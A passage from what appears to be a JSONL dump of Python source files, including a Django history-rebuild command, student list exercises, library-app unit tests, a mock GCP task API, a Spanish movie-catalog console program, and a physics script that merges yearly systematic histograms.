import MIN, create_history_record, insert_history_records\n\n\nclass Command(NoArgsCommand):\n def handle_noargs(self, **options):\n chunk_size = options.get('chunk_size', 1000)\n verbosity = options.get('verbosity', 0)\n models = apps.get_models(include_auto_created=True,\n include_deferred=True,\n include_swapped=True)\n models = [m for m in models if hasattr(m, '_tt_has_history')]\n models = [m for m in models if not m._meta.proxy]\n for i, m in enumerate(models):\n if verbosity:\n msg = u'%s/%s: %s' % (i + 1, len(models), m._meta.model_name)\n self.stdout.write(msg, self.style.MIGRATE_LABEL)\n\n numobjs = m.objects.all().count()\n with atomic():\n m._tt_model.objects.all().delete()\n\n collected = []\n for j, obj in enumerate(m.objects.all()):\n collected.append(create_history_record(m, obj, MIN))\n if len(collected) == chunk_size:\n if verbosity:\n msg = u' %s/%s' % (j + 1, numobjs)\n self.stdout.write(msg, ending=' ')\n self.stdout.write('OK', self.style.MIGRATE_SUCCESS)\n insert_history_records(m, collected)\n collected = []\n\n if collected:\n if verbosity:\n msg = u' %s/%s' % (j + 1, numobjs)\n self.stdout.write(msg, ending=' ')\n self.stdout.write('OK', self.style.MIGRATE_SUCCESS)\n insert_history_records(m, collected)\n","sub_path":"django_timetravel/management/commands/init_timetravel.py","file_name":"init_timetravel.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"396810746","text":"# def list():\n# \tlist1=[5,10,15,20,25]\n# \tlist=list1[0],list1[-1]\n# \treturn (list)\n# print (list())\n\n\n# a=[1,1,2,3,5,8,13,21,34,55,89]\n# b=[]\n# def list2():\n# \tfor index in a:\n# \t\tif index <=5:\n# \t\t\tprint (index)\n# \t\t\ta.append()\n\n\ndef FirstAndLast(NumList):\n\tnewlist = []\n\tnewlist.append(NumList[0])\n\tnewlist.append(NumList[-1])\n\tprint(newlist)\n\nFirstAndLast([1,2,3,4,5])\n\n\ndef IfLessThanFive(list1):\n\tfor elms in list1:\n\t\tif elms < 5:\n\t\t\tprint(elms)\n\nIfLessThanFive([0,2,78,123,1,9,4,3,-8])\n\ndef elements(list1 , list2):\n\tnewList = []\n\tfor numbers in list1:\n\t\tif numbers in list2:\n\t\t\tnewList.append(numbers)\n\tprint(newList)\n\nelements([1,3,4,67,45,25,12],[1,34,4,54,45,12])\n\n","sub_path":"yl1201718/lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"517391522","text":"from entities.Entities import Book, Client, Rental\nfrom repo.Repository import RepoBook, RepoClient, RepoRental\nfrom business.Service import ServiceBook, ServiceClient, ServiceRental\nfrom valid.Validation import BookValidator, ClientValidator, RepoValidator\nfrom undo.UndoRedo import UndoRedo, UndoOperation\nimport unittest\n\nclass Tests(unittest.TestCase):\n \n def setUp(self):\n self.__bookId = 5\n self.__title = \"Fratii Karamazov\"\n self.__author = \"Dostoievski\"\n self.__description = \"pam pam\"\n self.__clientId = 7\n self.__name = \"Ion Iliescu\"\n self.__rentalId = 16\n self.__rentedDate = 20\n self.__dueDate = 13\n self.__returnedDate = 30\n self.__book = Book(self.__bookId, self.__title, self.__description, self.__author)\n self.__client = Client(self.__clientId, self.__name)\n self.__rental = Rental(self.__rentalId, self.__bookId, self.__clientId, self.__rentedDate, self.__dueDate, self.__returnedDate)\n self.__repoBook = RepoBook()\n self.__repoClient = RepoClient()\n self.__undoList = UndoRedo()\n self.__repoRental = 
RepoRental(self.__repoBook, self.__repoClient)\n        self.__validBook = BookValidator()\n        self.__validClient = ClientValidator()\n        self.__validRental = RepoValidator(self.__repoBook, self.__repoClient)\n        self.__bookService = ServiceBook(self.__repoBook, self.__validBook, self.__undoList)\n        self.__clientService = ServiceClient(self.__repoClient, self.__validClient, self.__undoList)\n        self.__rentalService = ServiceRental(self.__repoBook, self.__repoClient, self.__validRental, self.__repoRental, self.__undoList)\n    \n    def testModels(self):\n        self.assertEquals(self.__book.get_book_id(), self.__bookId)\n        self.assertEquals(self.__client.get_name(), self.__name)\n        self.assertEquals(self.__rental.get_rental_id(), self.__rentalId)\n        #self.assertEquals self.__rental.get_number_of_rentals() == self.__numberOfRentals\n    \n    def testRepository(self):\n        self.assertEquals(len(self.__repoBook),0)\n        self.__repoBook.addElement(self.__book, 0)\n        self.assertEquals(len(self.__repoBook), 1)\n        new_book = Book(3, \"Ion\", \"glasul pamantului/glasul iubirii\", \"Liviu Rebreanu\")\n        self.__repoBook.addElement(new_book, 0)\n        self.assertEquals(len(self.__repoBook), 2)\n        try:\n            self.__repoBook.addElement(self.__book, 0)\n            self.fail()\n        except ValueError as re:\n            self.assertEquals(str(re), \"existing element\")\n        \n        self.assertEquals(len(self.__repoClient), 0)\n        self.__repoClient.addElement(self.__client, 0)\n        self.assertEquals(len(self.__repoClient), 1)\n        new_client = Client(2, \"Justin Trudeau\")\n        self.__repoClient.addElement(new_client, 0)\n        self.assertEquals(len(self.__repoClient), 2)\n        try:\n            self.__repoClient.addElement(self.__client, 0)\n            self.fail()\n        except ValueError as re:\n            self.assertEquals(str(re), \"existing element\")\n        self.__repoClient.removeElement(new_client.get_client_id())\n        self.assertEquals(len(self.__repoClient), 1)\n        try:\n            self.__repoClient.removeElement(new_client.get_client_id())\n            self.fail()\n        except ValueError as re:\n            self.assertEquals(str(re), \"inexisting element\")\n        \n        #self.__repo.printBooks()\n        new_book = Book(3, \"HP\", \"JK Rowling\", \"magic\")\n        self.__repoBook.updateElement(new_book, 0)\n        cnt = self.__repoBook.searchElement1(new_book)\n        cnt = int(cnt)\n        \n        \n    def testBusiness(self):\n        self.__repoBook = RepoBook()\n        self.__business = ServiceBook(self.__repoBook, self.__validBook, self.__undoList)\n        self.assertEquals(len(self.__business),0)\n        \n        self.__business.addNewBook(self.__bookId, self.__title, self.__author, self.__description)\n        self.assertEquals(len(self.__business), 1)\n        self.__business.addNewBook(15, \"GoT\", \"George RR Martin\", \"abcd\")\n        self.assertEquals(len(self.__business), 2)\n        \n        self.__repoClient = RepoClient()\n        self.__business = ServiceClient(self.__repoClient, self.__validClient, self.__undoList)\n        self.__business.addNewClient(self.__clientId, self.__name)\n        self.assertEquals(len(self.__business), 1)\n        self.__business.addNewClient(5, \"Nicolae Ceausescu\")\n        self.assertEquals(len(self.__business), 2)\n        element = Client(5, \"Traian Basescu\")\n        self.__repoClient.updateElement(element, 0)\n        search = self.__repoClient.searchElement(5, 2)\n        self.assertEquals(search.get_name(), \"Traian Basescu\")\n        self.__business.removeClient(5, \"Nicolae Ceausescu\")\n        self.assertEquals(len(self.__business), 1)\n        \n        self.__repoBook = RepoBook()\n        self.__business = ServiceBook(self.__repoBook, self.__validBook, self.__undoList)\n        self.__business.addNewBook(23, \"De veghe in lanul de secara\", \"JD Salinger\", \"Roman\")\n        
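# a second book is added and then removed below, so exactly one entry should remain\n        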
self.__business.addNewBook(15, \"Martianul\", \"Andy Weir\", \"I-a placut lui Leo\")\n self.__business.removeBook(15, 0)\n self.assertEquals(len(self.__business), 1)\n element = Book(15, \"1984\", \"George Orwell\", \"Tot lui Leo i-a placut\")\n self.__repoBook.addElement(element, 0)\n element = Book(15, \"1984\", \"Pam pam\", \"Tot lui Leo i-a placut\")\n self.__repoBook.updateElement(element, 0)\n search = self.__repoBook.searchElement(15, 1)\n self.assertEquals(search.get_author(), \"Pam pam\")\n \n \n \n \n def testRent(self):\n pass\n# def runTests(self):\n# self.testModels()\n# self.testRepository()\n# self.testBusiness()\n","sub_path":"FP and Logics/library/tests/Tests.py","file_name":"Tests.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"289577178","text":"import os\nimport logging\nimport json\nimport random\nfrom pprint import pformat\n\nfrom src.main.python.tranquilitybase.gcpdac_mock.config import counter\n\nlogger = logging.getLogger(\"application\")\n\napplication_response_json = \"\"\napplication_response_file = \"core/sample_responses/application/application_response_example.json\"\nwith open(application_response_file, \"r\") as fh:\n application_response_json = json.load(fh)\n\ndef next_taskid():\n task_cnt = next(counter)\n taskid = f\"MOCKTASKID{task_cnt}\"\n return taskid\n\ndef get_random_status():\n r = random.randint(0, 10)\n if r == 0:\n status = \"FAILURE\"\n elif r in (1, 2, 3, 4):\n status = \"STARTED\"\n elif r > 4:\n status = \"SUCCESS\"\n return status\n\n\ndef get_status():\n if os.environ.get(\"MOCK_MODE\"):\n return get_random_status()\n else:\n return \"SUCCESS\"\n\n\ndef create_async(applicationDetails):\n \"\"\"\n Return just the task_id.\n \"\"\"\n\n logger.debug(pformat(applicationDetails))\n taskid = next_taskid()\n logger.info(\"Task ID %s\", taskid)\n context = {\n \"taskid\": f\"{taskid}\"\n }\n return context, 201\n\n\ndef delete_async(oid):\n \"\"\"\n Return just the task_id.\n \"\"\"\n logger.debug(\"Id is {}\".format(oid))\n taskid = next_taskid()\n logger.info(\"Task ID %s\", taskid)\n context = {\n \"taskid\": f\"{taskid}\"\n }\n return context, 200\n\n\ndef create_application_result(taskid):\n logger.info(\"CREATE application RESULT %s\",format(taskid))\n\n retval = {\n \"status\": get_status()\n }\n if retval.get('status') == \"SUCCESS\" or retval.get('status') == \"FAILURE\":\n retval[\"payload\"] = json.dumps(application_response_json['payload'])\n return retval, 201\n\n\ndef delete_application_result(taskid):\n logger.info(\"DELETE application RESULT %s\",format(taskid))\n\n retval = {\n \"status\": get_status()\n }\n if retval.get('status') == \"SUCCESS\" or retval.get('status') == \"FAILURE\":\n retval[\"payload\"] = json.dumps(application_response_json['payload'])\n return retval, 200\n","sub_path":"src/main/python/tranquilitybase/gcpdac/mock/core/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"552851067","text":"class Solution(object):\n def removeDuplicates(self, nums):\n #count=0\n #while(count.\n \"\"\"\n\n\"\"\"\n Este módulo es una aplicación básica con un menú de opciones para cargar datos, contar elementos, y hacer búsquedas sobre una lista .\n\"\"\"\n#imports\n\nimport config as cf\nimport sys\nimport csv\nimport Support as sup\n\nfrom ADT import list as lt\nfrom DataStructures import 
listiterator as it\nfrom DataStructures import liststructure as lt\nfrom time import process_time \n\n#Funciones\n\ndef compareRecordIds(recordA, recordB):\n if int(recordA['id']) == int(recordB['id']):\n return 0\n elif int(recordA['id']) > int(recordB['id']):\n return 1\n return -1\n\n\ndef loadCSVFile (file, lst):\n lst=lt.newList(datastructure=\"ARRAY_LIST\")\n dialect = csv.excel()\n dialect.delimiter=\";\"\n try:\n with open( file, encoding=\"utf-8\") as csvfile:\n row = csv.DictReader(csvfile, dialect=dialect)\n for elemento in row: \n lt.addLast(lst,elemento)\n except:\n print(\"Hubo un error con la carga del archivo\")\n return lst\n\n\ndef loadMovies (file, lst):\n lst = loadCSVFile(file, lst) \n print(\"Datos cargados, \" + str(lt.size(lst)) + \" elementos cargados\")\n return lst\n\ndef FindGoodMovie(lst,lst2,name_director):\n \"Retorna: el numero de películas buenas de un director y su promedio de la votación.\"\n list_movies=[]\n info_movies= sup.findmoviesDirector(name_director, lst)\n avgsum=0\n for movie in info_movies:\n movie_data=sup.findmovieId(movie['id'], lst2)\n if movie_data[\"vote_average\"] >= 6:\n list_movies.append(movie_data['title'])\n avgsum+=float(movie_data['vote_average'])\n size=len(list_movies)\n avg=avgsum/size\n return(size,avg)\n\n\n\ndef rankingMovies(lst, criteria, opcion):\n \"\"\"\n Genera rankings de acuerdo a las condiciones puestas.\n\n Arg:\n lst :: list\n -La informacion de detallada de las peliculas.\n criteria :: str\n -Criterio de ordenamiento\n opcion :: int\n -Determina si se ordena de menor a mayor o de mayor a menor\n 1,2 respectivamente\n \n Retorna :: list\n -TAD list con el catalogo pedido.\n \"\"\"\n catalog=lt.newList(datastructure='ARRAY_LIST')\n sup.sort(lst, criteria, opcion)\n if opcion == '1':\n i=0\n while i < 5:\n movie=lt.getElement(lst, i)\n lt.addLast(catalog, movie['title'])\n i+=1\n elif opcion == '2':\n i=0\n while i < 10:\n movie=lt.getElement(lst, i)\n lt.addLast(catalog, movie['title'])\n i+=1\n return catalog\n\n\n\ndef SearchbyDirector(lst,lst2,name_director):\n \"\"\"\n Busca todas las peliculas en las que un director trabajo.\n Arg:\n -lst :: list \n La informacion en bruto de las peliculas.\n -lst2 :: list \n La informacion especifica de las peliculas.\n -name_director :: str\n El nombre del director.\n \n Retorna :: tuple \n -Todas las películas dirigidas, El numero de las películas \n y El promedio de la calificación de sus películas.\n \"\"\"\n avgsum= 0\n info_movies=sup.findmoviesDirector(name_director, lst)\n size=len(info_movies)\n list_movies=[]\n for movie in info_movies:\n movie_data=sup.findmovieId(movie['id'], lst2)\n list_movies.append(movie_data['title'])\n avgsum+=float(movie_data['vote_average'])\n avg=avgsum/size\n return(list_movies,size,avg)\n\ndef SearchbyActor(lst,lst2,actor_name):\n \"\"\"\n Busca todas las peliculas en las que un actor participo.\n Arg:\n -lst :: list \n -La informacion en bruto de las pelicula.\n -lst2 :: list\n -La informacion especifica de las peliculas.\n -actor_name :: str \n -Nombre del actor buscado\n retorna :: tuple \n -Todas las películas en las que actuo, el numero de las películas, \n el promedio de calificacion y el director con el que mas trabajo en ese orden.\n \"\"\"\n avgsum= 0\n info_movies=sup.findmoviesActor(actor_name, lst)\n size=len(info_movies)\n list_movies=[]\n dict_directors={}\n for movie in info_movies:\n print(movie)\n print(size)\n name_director=movie['director_name']\n movie_data=sup.findmovieId(movie['id'], lst2)\n 
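# resolve each movie id to its full record, then accumulate its title and rating\n        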
list_movies.append(movie_data['title'])\n        avgsum+=float(movie_data['vote_average'])\n        if name_director in dict_directors.keys():\n            dict_directors[name_director]+=1\n        else:\n            dict_directors[name_director]=1\n    # el director con mas apariciones, no la mayor clave alfabetica\n    director = max(dict_directors, key=dict_directors.get)\n    avg = round(avgsum/size, 2)\n    return(list_movies, size, avg, director)\n\ndef meetGenre(lst, lst2, genre):\n    \"\"\"\n    Busca todas las peliculas que corresponden al genero dado por parametro.\n    Arg:\n        lst :: list\n            -La informacion en bruto de las peliculas.\n        lst2 :: list\n            -La informacion especifica de las peliculas.\n        genre :: str\n            -El genero que se desea buscar.\n    Retorna :: tuple\n        -El titulo de las peliculas, el numero de peliculas y el promedio de votos en ese orden.\n    \"\"\"\n    avgsum=0\n    info_movies=sup.findmoviesGenre(genre, lst2)\n    list_movies=[]\n    size=len(info_movies)\n    i=0\n    while i < size:\n        list_movies.append(info_movies[i]['title'])\n        avgsum+=float(info_movies[i]['vote_count'])\n        i+=1\n    avgsum=round(avgsum/size,2)\n    return(list_movies, size, avgsum)\n\ndef moviesbygenre(lst2,genre,opcion,criteria):\n    \"\"\"\n    Genera rankings de acuerdo a las condiciones puestas.\n\n    Arg:\n        lst2 :: list\n            -La informacion detallada de las peliculas.\n        genre: str\n            - Genero de la película\n        criteria :: str\n            -Criterio de ordenamiento(vote_count o vote_average)\n        opcion :: int\n            -Determina si se ordena de menor a mayor o de mayor a menor\n            1,2 respectivamente\n    \n    Retorna :: list\n        -TAD list con el catalogo pedido.\n        -float: promedio de votos\n    \"\"\"\n    \n    catalog=lt.newList(datastructure='ARRAY_LIST')\n    listbygenre=sup.findmoviesGenre(genre,lst2)\n    sup.sort(listbygenre, criteria, opcion)\n    avgsum=0\n    if opcion == '1':\n        i=0\n        while i < 5:\n            movie=lt.getElement(listbygenre, i)\n            lt.addLast(catalog, movie['title'])\n            avgsum+=float(movie[criteria])\n            i+=1\n    elif opcion == '2':\n        i=0\n        while i < 10:\n            movie=lt.getElement(listbygenre, i)\n            lt.addLast(catalog, movie['title'])\n            avgsum+=float(movie[criteria])\n            i+=1\n    avgprom = avgsum/i\n    return (catalog,avgprom)\n\n\n#menus\n\ndef submenu2():\n    \"\"\"\n    Imprime el menu de la segunda opcion\n    \"\"\"\n    print('Criterios de ordenamiento:\\n')\n    print('\\t-1) \\\"vote_average\\\" : ordenar por la votacion promedio.')\n    print('\\t-2) \\\"vote_count\\\" : ordenar por cantidad de votos.')\n    print('Elija un orden de ordenamiento:\\n')\n    print('\\t-1) Top 5 peores en el criterio seleccionado.')\n    print('\\t-2) Top 10 mejores en el criterio seleccionado.')\n\ndef printMenu():\n    \"\"\"\n    Imprime el menu de opciones\n    \"\"\"\n    print(\"\\nBienvenido\")\n    print(\"1- Cargar Datos\")\n    print(\"2- Ranking de peliculas\")\n    print(\"3- Conocer un director\")\n    print(\"4- Conocer un actor\")\n    print(\"5- Entender un genero\")\n    print(\"6- Crear ranking\")\n    print(\"0- Salir\")\n\ndef main():\n    \"\"\"\n    Método principal del programa, se encarga de manejar todos los metodos adicionales creados\n\n    Instancia una lista vacia en la cual se guardarán los datos cargados desde el archivo\n    Args: None\n    Return: None \n    \"\"\"\n    lista_1=[]\n    lista_2=[]\n    best_10=[]\n    worst_5=[]\n    while True:\n        printMenu() #imprimir el menu de opciones en consola\n        inputs = input('Seleccione una opción para continuar\\n') #leer opción ingresada\n        if len(inputs)>0:\n            if int(inputs[0])==1: #opcion 1\n                print('1- Carga la informacion del casting de las peliculas\\n')\n                print('2- Carga la informacion detallada de las peliculas\\n')\n                opcion=input('Seleccione la lista de datos que desea cargar\\n')\n                if opcion == '1':\n                    
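# NOTE: las rutas CSV estan codificadas de forma fija y asumen una carpeta local Data/moviesdb\n                    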
lista_1=loadMovies('Data\\moviesdb\\MoviesCastingRaw-small.csv', lista_1)\n                elif opcion == '2':\n                    lista_2=loadMovies('Data\\moviesdb\\SmallMoviesDetailsCleaned.csv', lista_2)\n                else:\n                    print('Esa opcion no es valida')\n            elif int(inputs[0])==2: #opcion 2\n                submenu2()\n                criteria=input('Escoja un criterio de ordenamiento:\\n')\n                opcion=input('Escoja un orden:\\n')\n                if criteria == '1':\n                    if opcion == '1':\n                        worst_5=rankingMovies(lista_2, criteria, opcion)\n                        print('Las peores 5 peliculas segun su votacion promedio son: ')\n                        i=0\n                        while i < lt.size(worst_5):\n                            print(lt.getElement(worst_5,i))\n                            i+=1\n                    elif opcion == '2':\n                        best_10=rankingMovies(lista_2, criteria, opcion)\n                        print('Las mejores 10 peliculas segun su votacion promedio son: ')\n                        i=0\n                        while i < lt.size(best_10):\n                            print(lt.getElement(best_10,i))\n                            i+=1\n                    else:\n                        print('La opcion: \\\"', opcion,'\\\" no es una opcion valida')\n                elif criteria == '2':\n                    if opcion == '1':\n                        worst_5=rankingMovies(lista_2, criteria, opcion)\n                        print('Las peores 5 peliculas segun su cantidad de votos son: ')\n                        i=0\n                        while i < lt.size(worst_5):\n                            print(lt.getElement(worst_5,i))\n                            i+=1\n                    elif opcion == '2':\n                        best_10=rankingMovies(lista_2, criteria, opcion)\n                        print('Las mejores 10 peliculas segun su cantidad de votos son: ')\n                        i=0\n                        while i < lt.size(best_10):\n                            print(lt.getElement(best_10,i))\n                            i+=1\n                    else:\n                        print('La opcion: \\\"', opcion,'\\\" no es una opcion valida')\n                else:\n                    print(criteria, 'No es una opcion valida.')\n            elif int(inputs[0])==3: #opcion 3\n                director_name=input('Digite el nombre del director:\\n')\n                (movies_director, size, avg)=SearchbyDirector(lista_1, lista_2, director_name)\n                print('La cantidad de peliculas del director son: ', str(size), 'y tiene una votacion promedio de: ', str(avg),'.')\n                print('Las peliculas en las que participo fueron:\\n')\n                cadena=','.join(movies_director)\n                print(cadena)\n            elif int(inputs[0])==4: #opcion 4\n                actor_name=input('Digite el nombre del actor:\\n')\n                (movies_actor, size, avg, director)=SearchbyActor(lista_1, lista_2, actor_name)\n                print('La cantidad de peliculas en las que participo el actor son: ', str(size), 'y tiene una votacion promedio de: ', str(avg),'.')\n                print('El director con el que más trabajo fue: ', director)\n                print('Las peliculas en las que participo fueron:\\n')\n                cadena=','.join(movies_actor)\n                print(cadena)\n            elif int(inputs[0])==5: #opcion 5\n                genre=input('Digite un genero para buscar:\\n')\n                (movies_genre, size, avg)=meetGenre(lista_1, lista_2, genre)\n                print('La cantidad de peliculas encontradas para el genero: \\\"', genre,'\\\" son: ', str(size), 'y tiene una votacion promedio de: ', str(avg),'.')\n                print('Los titulos son:\\n')\n                cadena=','.join(movies_genre)\n                print(cadena)\n\n            elif int(inputs[0])==6: #opcion 6\n                genre = input(\"Escoja un género:\\n\")\n                criteria=input('Escoja un criterio de ordenamiento:\\n')\n                opcion=input('Escoja un orden:\\n')\n                if criteria == '1':\n                    if opcion == '1':\n                        worst_5_va=moviesbygenre(lista_2, genre, opcion, criteria)\n                        print('Las peores 5 peliculas segun su votacion promedio son: ')\n                        print(\"el promedio de votación es: \"+ str(worst_5_va[1]))\n                        i=0\n                        while i < lt.size(worst_5_va[0]):\n                            print(lt.getElement(worst_5_va[0],i))\n                            i+=1\n                    elif opcion == '2':\n                        best_10_va=moviesbygenre(lista_2, genre, opcion, criteria)\n                        print('Las mejores 10 peliculas segun su votacion promedio son: ')\n                        print(\"el promedio de votación es: \"+ str(best_10_va[1]))\n                        i=0\n                        while 
i < lt.size(best_10_va[0]):\n                            print(lt.getElement(best_10_va[0],i))\n                            i+=1\n                    else:\n                        print('La opcion: \\\"', opcion,'\\\" no es una opcion valida')\n                elif criteria == '2':\n                    if opcion == '1':\n                        worst_5_vc=moviesbygenre(lista_2, genre, opcion, criteria)\n                        print('Las peores 5 peliculas segun su cantidad de votos son: ')\n                        print(\"el promedio de votación es: \"+ str(worst_5_vc[1]))\n                        i=0\n                        while i < lt.size(worst_5_vc[0]):\n                            print(lt.getElement(worst_5_vc[0],i))\n                            i+=1\n                    elif opcion == '2':\n                        best_10_vc=moviesbygenre(lista_2, genre, opcion, criteria)\n                        print('Las mejores 10 peliculas segun su cantidad de votos son: ')\n                        print(\"el promedio de votación es: \"+ str(best_10_vc[1]))\n                        i=0\n                        while i < lt.size(best_10_vc[0]):\n                            print(lt.getElement(best_10_vc[0],i))\n                            i+=1\n                    else:\n                        print('La opcion: \\\"', opcion,'\\\" no es una opcion valida')\n\n\n            elif int(inputs[0])==0: #opcion 0, salir\n                sys.exit(0)\n    \nif __name__ == \"__main__\":\n    main()","sub_path":"App/reto.py","file_name":"reto.py","file_ext":"py","file_size_in_byte":15789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}{"seq_id":"57716661","text":"#! /usr/bin/env python\n\n\n#\n# Argument parser and logging\n#\nimport os, argparse\nargParser = argparse.ArgumentParser(description = \"Argument parser\")\nargParser.add_argument('--logLevel', action='store', default='INFO', help='Log level for logging', nargs='?', choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG', 'TRACE'])\n# argParser.add_argument('--tag', action='store', default='unfTest2', help='Specify type of reducedTuple')\nargs = argParser.parse_args()\n\nimport ROOT\nimport pdb\nimport glob\n\nROOT.gROOT.SetBatch(True)\n\nfrom ttg.tools.helpers import plotDir, getObjFromFile, lumiScales, lumiScalesRounded\nimport copy\nimport pickle\nimport numpy\nfrom ttg.plots.systematics import showSysListRunII\n\nfrom ttg.tools.logger import getLogger\nlog = getLogger(args.logLevel)\n\n\ndef getRMS(histDict):\n# WARNING this modifies the systematics histograms, be aware if you look at them later in the code\n  nominal = histDict[''].Clone()\n  rms = nominal.Clone()\n  rms.Reset('ICES')\n\n  for var in histDict.keys():\n    if var == '': continue\n    histDict[var].Add(nominal, -1.)\n    histDict[var].Multiply(histDict[var])\n    rms.Add(histDict[var])\n\n  nvars = len(histDict)-1\n\n  for i in range(0, rms.GetXaxis().GetNbins()+1):\n    rms.SetBinContent(i, (rms.GetBinContent(i)/nvars)**0.5)\n  return rms\n\ndef getEnv(histDict):\n# WARNING this modifies the systematics histograms, be aware if you look at them later in the code\n  nominal = histDict[''].Clone()\n  maxUp = nominal.Clone()\n  maxUp.Reset('ICES')\n  maxDown = maxUp.Clone()\n\n  for var in histDict.keys(): \n    histDict[var].Add(nominal, -1.)\n\n  for i in range(0, nominal.GetNbinsX()+1):\n    maxUp.SetBinContent( i, max([hist.GetBinContent(i) for hist in histDict.values()]))\n    maxDown.SetBinContent(i, min([hist.GetBinContent(i) for hist in histDict.values()]))\n\n  return maxUp, maxDown\n\nlumiUnc = {\n'lumi_1718' : {'16': 0. , '17': 0.006 , '18': 0.002 },\n'lumi_2016' : {'16': 0.009 , '17': 0. , '18': 0. },\n'lumi_2017' : {'16': 0. , '17': 0.02 , '18': 0. },\n'lumi_2018' : {'16': 0. , '17': 0. , '18': 0.015 },\n'lumi_3Ycorr': {'16': 0.006 , '17': 0.009 , '18': 0.02 }\n}\n\ndef invertVar(nomHist, varHist):\n  inverseHist = nomHist.Clone()\n  for i in range(1, nomHist.GetNbinsX()+1):\n    inverseHist.SetBinContent(i, max(2. 
* nomHist.GetBinContent(i) - varHist.GetBinContent(i), 0.))\n return inverseHist\n\n# distList = [\n# 'unfReco_phLepDeltaR',\n# # 'unfReco_jetLepDeltaR',\n# # 'unfReco_jetPt',\n# # 'unfReco_ll_absDeltaEta',\n# # 'unfReco_ll_deltaPhi',\n# # 'unfReco_phAbsEta',\n# # 'unfReco_phBJetDeltaR',\n# # 'unfReco_phPt',\n# # 'unfReco_phLep1DeltaR',\n# # 'unfReco_phLep2DeltaR',\n# # 'unfReco_Z_pt',\n# # 'unfReco_l1l2_ptsum'\n# ]\n\n\n# noYearCor = ['lSFElStat' ,'lSFMuStat' ,'pvSF' ,'trigStatEE','trigStatEM','trigStatMM','trigSyst' ,'HFUC' ,'AbsoluteUC' ,'BBEC1UC' ,'EC2UC' ,'RelativeSampleUC', 'bTagbUC']\n\nnoYearCor = [i.split('_2016')[0] for i in showSysListRunII if i.count('_2016')]\n#################### main code ####################\n\n\n\nfor channel in ['ee', 'emu', 'mumu', 'all']:\n \n distList = glob.glob('/storage_mnt/storage/user/gmestdac/public_html/ttG/2016/phoCBfull-niceEstimDD-RE/' + channel + '/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/*.pkl')\n distList = [i.split('/')[-1].split('.pkl')[0] for i in distList]\n\n if not os.path.exists('/storage_mnt/storage/user/gmestdac/public_html/ttG/all/phoCBfull-niceEstimDD-RE-merged/' + channel + '/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/'):\n os.makedirs('/storage_mnt/storage/user/gmestdac/public_html/ttG/all/phoCBfull-niceEstimDD-RE-merged/' + channel + '/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/')\n\n for dist in distList:\n log.info('running for plot '+ dist + ' in the channel ' + channel)\n try:\n reco16 = pickle.load(open('/storage_mnt/storage/user/gmestdac/public_html/ttG/2016/phoCBfull-niceEstimDD-RE/'+ channel +'/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/' + dist + '.pkl','r'))\n reco17 = pickle.load(open('/storage_mnt/storage/user/gmestdac/public_html/ttG/2017/phoCBfull-niceEstimDD-RE/'+ channel +'/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/' + dist + '.pkl','r'))\n reco18 = pickle.load(open('/storage_mnt/storage/user/gmestdac/public_html/ttG/2018/phoCBfull-niceEstimDD-RE/'+ channel +'/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/' + dist + '.pkl','r'))\n\n recoRunII = copy.deepcopy(reco16)\n\n for var in recoRunII.keys():\n direc = '' # if nominal this just stays\n if var.count('Up'):\n var = var.split('Up')[0]\n direc = 'Up'\n elif var.count('Down'):\n var = var.split('Down')[0]\n direc = 'Down'\n\n\n if any(var.count(uncorVar) for uncorVar in noYearCor):\n recoRunII[var + '_2016' + direc] = {}\n recoRunII[var + '_2017' + direc] = {}\n recoRunII[var + '_2018' + direc] = {}\n for proc in recoRunII[var + direc].keys():\n # recoRunII[var + direc][proc] = None\n recoRunII[var + '_2016' + direc][proc] = reco16[var + direc][proc].Clone()\n recoRunII[var + '_2016' + direc][proc].Add(reco17[dist][proc])\n recoRunII[var + '_2016' + direc][proc].Add(reco18[dist][proc])\n\n recoRunII[var + '_2017' + direc][proc] = reco16[dist][proc].Clone()\n recoRunII[var + '_2017' + direc][proc].Add(reco17[var + direc][proc])\n recoRunII[var + '_2017' + direc][proc].Add(reco18[dist][proc])\n\n recoRunII[var + '_2018' + direc][proc] = reco16[dist][proc].Clone()\n recoRunII[var + '_2018' + direc][proc].Add(reco17[dist][proc])\n recoRunII[var + '_2018' + direc][proc].Add(reco18[var + direc][proc])\n del recoRunII[var + direc]\n\n else:\n for proc in recoRunII[var+direc].keys():\n recoRunII[var + direc][proc].Add(reco17[var + direc][proc])\n recoRunII[var + direc][proc].Add(reco18[var + direc][proc])\n\n recoRunII[dist + 'fdpUp'] = {}\n recoRunII[dist + 'fdpDown'] = {}\n recoRunII[dist + '2qUp'] = {}\n recoRunII[dist + '2qDown'] = {}\n\n recoRunII[dist + 
